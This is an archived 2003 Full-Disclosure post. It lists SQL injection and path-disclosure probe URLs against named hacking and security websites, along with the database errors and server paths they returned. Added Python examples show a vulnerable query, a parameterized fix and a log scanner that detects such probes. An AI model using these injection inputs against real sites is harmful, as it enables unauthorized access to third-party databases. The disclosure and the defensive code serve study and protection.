[Full-Disclosure] @(#)Mordred Security Notice - exploring the hacking websites

From: Sir Mordred (mordred_at_s-mail.com)
Date: 05/05/03

    To: full-disclosure@lists.netsys.com
    Date: Mon, 05 May 2003 15:58:59 +0000

    // @(#)Mordred Labs security notice - exploring the hacking websites

    Release date: May 5, 2003
    Author: Sir Mordred (mordred@s-mail.com)

    I. INTRODUCTION

    This is the first security notice about the real state of web application
    security, illustrated with real-world examples. In this issue we will be
    focusing on websites related to hacking.
    Security companies and news portals will be discussed later.
    For now, it would be nice to see the reaction of the community to this
    issue.

    Looking at this notice, one can clearly see that the combination of
    ASP/PHP and a relational database is very dangerous; even the "security
    experts" make mistakes :-).

    Surely, not all of the vulnerabilities have been found/disclosed.
    For example, there was no testing for CSS (cross-site scripting)
    vulnerabilities at all.

    Note that the vulnerabilities are presented here in the following format:

    * ISSUE <number> - description of the vulnerability
    blank line
    the url to demonstrate this vulnerability
    blank line
    the error message (if exists)

    One last word to tripz: thanks for the help.

    II. DETAILS

    1) ---------------------- www.progenic.com ------------------------------

    It seems that the primary goal of this website, created "for the love of
    the scene", is to maintain a large collection of links to security/hacking
    resources.

    * ISSUE 1 - SQL injection in /vote/default.asp page

    http://www.progenic.com/vote/?id=e',s

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Line 1: Incorrect syntax near ','.
    /vote/Default.asp, line 154

    * ISSUE 2 - SQL injection in /info/default.asp page

    http://www.progenic.com/info/default.asp?id=.'

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Unclosed quotation mark before the character string '.''.
    /info/Default.asp, line 32

    2) --------------------- www.hackinthebox.org --------------------------
    <quote>
    Hack In The Box is designed to facilitate discussions on security related
    topics, create security awareness, and to try and provide a comprehensive
    database of security knowledge and resources to the public
    </quote>

    Rather interesting website; the nice thing about it is that HITB opened the
    source code of certain parts of the website. I did not bother to look at
    their source, though.

    * ISSUE 1 - SQL injection in /memberlist.php page

    http://www.hackinthebox.org/memberlist.php?letter=A&sortby=uname,

    1064: You have an error in your SQL syntax.
    Check the manual that corresponds to your MySQL server version for the
    right syntax to use near ' LIKE '%' ORDER BY uname,' at line 1

    3) ---------------------- www.hackerscenter.com -----------------------
    <quote>
    The best resource for hackers and crackers: tons of tools, tutorials,
    books, articles, analysis.
    Join our Top50 or enjoy our Online tools!!!
    </quote>

    * ISSUE 1 - SQL injection in /top50/default.asp page

    http://www.hackerscenter.com/top50/default.asp?id=9,'

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
    expression 'id=9,''.
    /top50/default.asp, line 249

    * ISSUE 2 - SQL injection in /downloads/download.asp page

    http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
    expression 'id=7,'.
    /downloads/download.asp, line 37

    * ISSUE 3 - SQL injection in /articles/article.asp page

    Visiting the url http://www.hackerscenter.com/articles/article.asp?id=28
    gives us back their article "Securing Windows".

    However, visiting the url
    http://www.hackerscenter.com/articles/article.asp?id=28111
    gives us back the error page with the message "Exception occured in
    /articles/article.asp, line 129".

    But visiting
    http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28 gives
    us the above article.

    * ISSUE 4 - SQL injection in /articles/archive.asp

    http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SUBJECT

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression
    'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY 'SUBJECT DESC'.
    /articles/archive.asp, line 154

    4) ------------------------- www.codeingtheweb.net ---------------------------
    <quote>
    We deal in security news, security programs and virus alerts.
    We also have an online messenger system, top50, forum etc. An amazing site!
    </quote>

    * ISSUE 1 - SQL injection in /top50/index.php page

    http://www.codeingtheweb.net/top50/index.php?cid=1'\1

    You have an error in your SQL syntax near '\'\\1 order by thin DESC,ranks
    DESC,star DESC,thout DESC limit 0,50' at line 1

    5) ------------------------------ www.ebcvg.com ------------------------------
    <quote>
    eBCVG.com is a security portal dedicated to providing security professionals
    with the knowledge and resources needed to help protect all of their data,
    applications ... etc...
    It was developed by IT and security experts to facilitate discussion on
    security related topics, promote security awareness and to provide a
    comprehensive and helpful database of security.
    </quote>

    * ISSUE 1 - Path disclosure in /articles.php page

    http://www.ebcvg.com/articles.php?id='

    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
    result resource in /home/1111146160/www/web/articles.php on line 37
    Unabled to read from database.

    * ISSUE 2 - SQL injection in /articles.php page

    Visiting the url http://www.ebcvg.com/articles.php?id=126 gives us back the
    article "Copying Copy Protected CD's".

    However, visiting the url http://www.ebcvg.com/articles.php?id=12611 gives
    us the page with the error message "Unabled to read from database".

    But the url http://www.ebcvg.com/articles.php?id=12611+or+id=126 gives us
    the above article.
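    The pattern behind hackerscenter ISSUE 3 and ebcvg ISSUE 2 above (an
    unknown id returns nothing, but "unknown id or id=known" returns the known
    article) is what happens when the id parameter is pasted into the query
    text. The following is an added example, not code from any of the sites
    in this notice: an in-memory SQLite table with an assumed schema stands in
    for their databases, the vulnerable function concatenates the parameter
    the way the affected pages evidently do, and the fixed function rejects
    anything that is not a plain integer and binds the value as a query
    parameter.

```python
import re
import sqlite3

# Constructed stand-in for the sites' article tables; the schema and the
# two rows are assumptions for this example, not taken from the sites.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO articles VALUES (28, 'Securing Windows');
INSERT INTO articles VALUES (126, 'Copying Copy Protected CD''s');
"""

INTEGER_RE = re.compile(r"^[0-9]+$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


DB = make_db()


def fetch_article_vulnerable(raw_id, conn=DB):
    """Builds the WHERE clause by string concatenation, the style of
    article.asp?id=... and articles.php?id=... described in the notice.
    Returns ("ok", title_or_None) or ("error", message)."""
    query = "SELECT title FROM articles WHERE id=" + raw_id
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        # The affected pages echo this message to the visitor, which is
        # what turns a syntax error into confirmation of the flaw.
        return ("error", str(exc))
    return ("ok", row[0] if row else None)


def fetch_article_fixed(raw_id, conn=DB):
    """Validates that the id is a plain integer, then binds it as a
    parameter so the input can never become part of the SQL text.
    Returns ("ok", title_or_None) or ("rejected", None)."""
    if not INTEGER_RE.match(raw_id):
        return ("rejected", None)
    row = conn.execute(
        "SELECT title FROM articles WHERE id=?", (int(raw_id),)
    ).fetchone()
    return ("ok", row[0] if row else None)


if __name__ == "__main__":
    # "28111 or id=28" is the decoded form of id=28111+or+id=28 in the url.
    for probe in ("28", "28111", "28111 or id=28", "e',s"):
        print(repr(probe), fetch_article_vulnerable(probe), fetch_article_fixed(probe))
```

    The validation step is not what stops the injection; the bound parameter
    is. The integer check is there so that the page can answer with a clean
    "not found" instead of a database error, which is the detail that gave
    the issues above away.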

    * ISSUE 3 - Path disclosure in /download.php

    http://www.ebcvg.com/download.php?id='

    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
    result resource in /home/1111146160/www/web/download.php on line 7
    Warning: Cannot add header information - headers already sent by (output
    started at /home/1111146160/www/web/download.php:7) in
    /home/1111146160/www/web/download.php on 12

    * ISSUE 4 - SQL injection in /download.php

    This is almost identical to issue 2, only the url is
    http://www.ebcvg.com/download.php?id=<number>
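    Every issue in this notice is visible in an ordinary web server access
    log as a request whose query parameter carries a quote, a stray comma, or
    an "or ...=" expression, usually followed by a 500 response when the page
    shows the database error. The following is an added example, not part of
    the original notice: a small scanner that decodes the query string of
    each request and flags those shapes. The log lines are constructed from
    the request paths in the notice, with an assumed client address,
    timestamps, sizes and status codes.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines modelled on the request urls in
# the notice; the client address, timestamps, sizes and status codes are
# assumed, not taken from any real server log.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2003:15:58:59 +0000] "GET /articles/article.asp?id=28 HTTP/1.1" 200 5120
203.0.113.5 - - [05/May/2003:15:59:02 +0000] "GET /articles/article.asp?id=28111+or+id=28 HTTP/1.1" 200 5120
203.0.113.5 - - [05/May/2003:15:59:10 +0000] "GET /info/default.asp?id=.%27 HTTP/1.1" 500 812
203.0.113.5 - - [05/May/2003:15:59:14 +0000] "GET /downloads/download.asp?id=7,&area=HACKING HTTP/1.1" 500 812
203.0.113.5 - - [05/May/2003:15:59:20 +0000] "GET /articles/archive.asp?searchstring=SQL&field=SUBJECT HTTP/1.1" 200 2200
203.0.113.5 - - [05/May/2003:15:59:25 +0000] "GET /articles/archive.asp?searchstring=SQL&field=%27SUBJECT HTTP/1.1" 500 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# "... or id=28" style boolean expressions, and union/select forms.
BOOLEAN_RE = re.compile(r"(?i)\b(or|and)\b\s+\S+\s*=")
UNION_RE = re.compile(r"(?i)\bunion\b.*\bselect\b")
# Parameters named id or *_id are expected to hold a plain integer.
ID_PARAM_RE = re.compile(r"(?i)(^|_)id$")
INTEGER_RE = re.compile(r"^[0-9]+$")


def classify_value(name, value):
    """Return a reason string if a decoded parameter value looks like an
    SQL injection probe, otherwise None."""
    if any(ch in value for ch in "'\"\\;"):
        return "quote or escape character in parameter"
    if BOOLEAN_RE.search(value) or UNION_RE.search(value):
        return "SQL boolean/union expression in parameter"
    if ID_PARAM_RE.search(name) and not INTEGER_RE.match(value):
        return "non-integer value in identifier parameter"
    return None


def scan_log(text):
    """Parse access log lines and return one finding per suspicious
    parameter, keeping the response status as corroborating evidence."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        # parse_qsl decodes %27 to ' and + to space, as the server did.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            reason = classify_value(name, value)
            if reason:
                findings.append({
                    "ip": m.group("ip"),
                    "path": target.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} "
              f"-> {f['reason']} (HTTP {f['status']})")
```

    The identifier rule is the one worth keeping even after the queries are
    fixed: a site whose id parameters are always integers should never see
    "7," or ".'" in one, so a single such request is a signal regardless of
    whether the page still errors.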

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
